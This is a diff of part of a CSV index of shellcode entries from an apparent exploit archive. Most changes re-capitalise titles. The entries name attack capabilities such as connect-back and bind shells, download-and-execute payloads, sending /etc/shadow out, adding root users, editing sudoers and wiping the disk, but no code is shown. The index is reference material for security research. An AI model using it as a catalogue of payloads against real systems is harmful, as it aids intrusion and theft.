13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
|
||||
13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - flush iptables rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0
|
||||
13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - connect-back semi-stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0
|
||||
13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - 4919 port bind Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
|
||||
13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind Port 4919 Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
|
||||
13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
|
||||
13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0
|
||||
13301,platforms/linux_ppc/shellcode/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
|
||||
|
@ -15549,20 +15556,20 @@ id,file,description,date,author,platform,type,port
|
|||
13303,platforms/linux_ppc/shellcode/13303.c,"Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
|
||||
13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0
|
||||
13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
|
||||
13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - portbind port 8975 Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
|
||||
13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Portbind Port 8975 Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
|
||||
13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying Shellcode for IDS evasion (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
|
||||
13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on port 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
|
||||
13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens for Shellcode on 5555/TCP and jumps to it (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
|
||||
13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Polymorphic Shellcode disable Network Card (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - /bin/sh polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - 4444 Port Binding Shellcode (xor-encoded) (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0
|
||||
13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - Binding Port 4444 Shellcode (xor-encoded) (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0
|
||||
13314,platforms/lin_x86/shellcode/13314.c,"Linux/x86 - reboot() polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - Polymorphic chmod(_/etc/shadow__666) Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0
|
||||
13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - bindport 8000 & execve iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - bindport 8000 & add user with root access Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - 8000 Bind Port ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - Bind Port 8000 & Execve Iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind Port 8000 & Add User with Root Access Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - Bind Port 8000 ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13320,platforms/lin_x86/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86,shellcode,0
|
||||
13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding & busybox Launching Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0
|
||||
13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
|
||||
|
@ -15572,8 +15579,8 @@ id,file,description,date,author,platform,type,port
|
|||
13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
13328,platforms/lin_x86/shellcode/13328.c,"Linux/x86 - Shellcode obfuscator",2008-12-09,sm4x,lin_x86,shellcode,0
|
||||
13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - connect-back port UDP/54321 live packet capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
|
||||
13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - append rsa key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
|
||||
13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Connectback Port 54321/UDP Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
|
||||
13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
|
||||
13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
|
||||
13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
|
||||
13333,platforms/lin_x86/shellcode/13333.txt,"Linux/x86 - setuid(0) & execve(/bin/sh_0_0) Shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0
|
||||
|
@ -15582,7 +15589,7 @@ id,file,description,date,author,platform,type,port
|
|||
13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0
|
||||
13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - Connect back (140.115.53.35:9999)_ download a file (cb) and execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
|
||||
13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0
|
||||
13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Connect Back Port 8192.send.exit /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
|
||||
13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
|
||||
13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - writes a php connectback shell (/var/www/cb.php) to the filesystem Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
|
||||
13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / attempts to block the process from being stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0
|
||||
13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) . setgid(0) . aslr_off Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0
|
||||
|
@ -15603,10 +15610,10 @@ id,file,description,date,author,platform,type,port
|
|||
13357,platforms/lin_x86/shellcode/13357.c,"Linux/x86 - stdin re-open and /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
|
||||
13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - re-use of /bin/sh string in .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
|
||||
13359,platforms/lin_x86/shellcode/13359.c,"Linux/x86 - setuid(0) and /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
|
||||
13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - setuid/portbind (Port 31337) Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
|
||||
13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - portbind (2707) Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0
|
||||
13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - setuid/portbind Port 31337 Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
|
||||
13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Portbind 2707 Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0
|
||||
13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0
|
||||
13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() portbind 31337/TCP Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
|
||||
13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() Portbind 31337/TCP Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
|
||||
13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
|
||||
13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0
|
||||
13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - xor-encoded Connect Back (127.0.0.1:80) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0
|
||||
|
@ -15616,8 +15623,8 @@ id,file,description,date,author,platform,type,port
|
|||
13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0
|
||||
13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - /tmp/swr to SWAP restore Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
|
||||
13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
|
||||
13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Password Authentication portbind (64713) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
|
||||
13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - portbind (port 64713) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
|
||||
13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Password Authentication Portbind 64713 Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
|
||||
13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Portbind Port 64713 Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
|
||||
13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
|
||||
13376,platforms/lin_x86/shellcode/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
|
||||
13377,platforms/lin_x86/shellcode/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
|
||||
|
@ -15670,8 +15677,8 @@ id,file,description,date,author,platform,type,port
|
|||
13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
|
||||
13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0
|
||||
13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
|
||||
13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - portbind port 5074 toupper Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0
|
||||
13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add user 't00r' encrypt Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Portbind Port 5074 toupper Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0
|
||||
13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
|
||||
13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0
|
||||
|
@ -15691,9 +15698,9 @@ id,file,description,date,author,platform,type,port
|
|||
13445,platforms/lin_x86/shellcode/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13446,platforms/lin_x86/shellcode/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
|
||||
13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - portbind port 5074 Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - portbind port 5074 + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add user 't00r' Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - Portbind Port 5074 Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - Portbind Port 5074 + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User 't00r' Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
|
||||
13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add user Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0
|
||||
13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
|
||||
13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
|
||||
|
@ -15706,7 +15713,7 @@ id,file,description,date,author,platform,type,port
|
|||
13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh toupper() evasion Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0
|
||||
13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
|
||||
13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
|
||||
13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - bindshell port 4444 Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0
|
||||
13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bindshell Port 4444 Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0
|
||||
13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0
|
||||
13465,platforms/multiple/shellcode/13465.c,"Linux PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0
|
||||
13466,platforms/multiple/shellcode/13466.c,"OSX PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode,0
|
||||
|
@ -15714,12 +15721,12 @@ id,file,description,date,author,platform,type,port
|
|||
13468,platforms/multiple/shellcode/13468.c,"Linux/x86 & Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0
|
||||
13469,platforms/multiple/shellcode/13469.c,"Linux/x86 & bsd/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0
|
||||
13470,platforms/netbsd_x86/shellcode/13470.c,"NetBSD/x86 - kill all processes Shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode,0
|
||||
13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - callback Shellcode (port 6666) (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
|
||||
13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - Callback Port 6666 Shellcode (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
|
||||
13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
|
||||
13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
|
||||
13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0
|
||||
13475,platforms/openbsd_x86/shellcode/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 Bytes)",2006-05-01,hophet,openbsd_x86,shellcode,0
|
||||
13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - portbind port 6969 Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0
|
||||
13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - Portbind Port 6969 Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0
|
||||
13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0
|
||||
13478,platforms/osx_ppc/shellcode/13478.c,"OSX/PPC - sync()_ reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0
|
||||
13479,platforms/osx_ppc/shellcode/13479.c,"OSX/PPC - execve(/bin/sh)_ exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0
|
||||
|
@ -15736,46 +15743,46 @@ id,file,description,date,author,platform,type,port
|
|||
13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0
|
||||
13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - connect-back (with XNOR encoded session) Shellcode (600 bytes)",2006-07-21,xort,solaris_sparc,shellcode,0
|
||||
13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid/execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
|
||||
13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - portbind (port 6666) Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
|
||||
13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Portbind Port 6666 Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
|
||||
13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0
|
||||
13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - portbind port 6789 Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
|
||||
13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Portbind Port 6789 Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
|
||||
13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-bac Shellcode k (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
|
||||
13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - portbinding Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
|
||||
13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - portbind/TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0
|
||||
13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
|
||||
13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Portbind Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
|
||||
13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - Portbind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0
|
||||
13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
|
||||
13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0)_ execve(/bin/cat_ /etc/shadow)_ exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
|
||||
13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
|
||||
13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - Add services and execve inetd Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
|
||||
13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0
|
||||
13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 Shellcode",2009-07-27,Skylined,win_x86,shellcode,0
|
||||
13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Bind Shell Port 28876 Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode,0
|
||||
13505,platforms/win_x86/shellcode/13505.c,"Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0
|
||||
13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0
|
||||
13508,platforms/win_x86/shellcode/13508.asm,"Win32 - telnetbind by Winexec 23 port Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0
|
||||
13508,platforms/win_x86/shellcode/13508.asm,"Win32 - Winexec Telnet Bind 23 Port Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0
|
||||
13509,platforms/win_x86/shellcode/13509.c,"Win32 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0
|
||||
13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 FR - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0
|
||||
13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 (FR) - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0
|
||||
13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0
|
||||
13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
|
||||
13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
|
||||
13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback_ receive_ save and execute Shellcode",2008-08-25,loco,win_x86,shellcode,0
|
||||
13515,platforms/win_x86/shellcode/13515.pl,"Win32 - Download and Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",win_x86,shellcode,0
|
||||
13515,platforms/win_x86/shellcode/13515.pl,"Win32 - Download & Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",win_x86,shellcode,0
|
||||
13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Tiny Download and Exec Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0
|
||||
13517,platforms/win_x86/shellcode/13517.asm,"Win32 - download and execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0
|
||||
13517,platforms/win_x86/shellcode/13517.asm,"Win32 - Download & Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0
|
||||
13518,platforms/win_x86/shellcode/13518.c,"Win32/NT/XP - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,win_x86,shellcode,0
|
||||
13519,platforms/win_x86/shellcode/13519.c,"Win32 SP1/SP2 - Beep Shellcode (35 bytes)",2006-04-14,xnull,win_x86,shellcode,0
|
||||
13520,platforms/win_x86/shellcode/13520.c,"Win32/XP SP2 - Pop up message box Shellcode (110 bytes)",2006-01-24,Omega7,win_x86,shellcode,0
|
||||
